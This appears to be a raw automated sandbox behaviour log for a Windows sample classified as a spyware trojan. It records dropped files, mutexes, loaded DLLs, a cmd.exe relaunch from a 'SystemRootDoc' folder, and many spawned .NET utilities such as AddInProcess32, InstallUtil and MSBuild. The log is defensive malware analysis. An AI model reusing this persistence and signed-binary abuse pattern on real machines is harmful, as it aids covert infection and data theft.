Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: AddInProcess32.exe, 00000005.00000002.4838057286.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ll\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBpA

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@63/102@1/1

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FFD946A1060 SetLastError,FormatMessageW,GetLastError,SetLastError,FormatMessageW,GetLastError,

4_2_00007FFD946A1060

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

File created: C:\Users\user\SystemRootDoc

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\IwMAIz6YYiXAdbpb
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3924
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5448

Source: C:\Users\user\Desktop\pKxhpP0spW.exe

File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f

Jump to behavior

Source: pKxhpP0spW.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pKxhpP0spW.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: pKxhpP0spW.exe

Virustotal: Detection: 9%

Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\OS\win\OsUtils_win.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\OS\win\FakeWindow.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\FileCache.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\win\MoveToTrash.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\DirectoryWatcher.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\win\Junction.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi\Fnd\Filesystem\win\DirectoryWatcher.cpp
Source: motor1.exe	String found in binary or memory: D:\J\WS\workspace\Web-installer-WinMac\ext\foundation\src\Movavi/Fnd/RAII/Releasable.h

Source: C:\Users\user\Desktop\pKxhpP0spW.exe

File read: C:\Users\user\Desktop\pKxhpP0spW.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pKxhpP0spW.exe "C:\Users\user\Desktop\pKxhpP0spW.exe"
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\motor1.exe "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 76
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 76
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\motor1.exe "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: glog.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: boost_filesystem-mt-x64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: webuid.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndcrashhandler.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndnetworking.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndstring.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndcrashhandler.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndnetworking.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndstring.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndapplocations.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndfilesystem.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndos.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndstring.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndexception.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndtime.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: cpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndhash.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndpointer.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndexception.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: fndversion.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
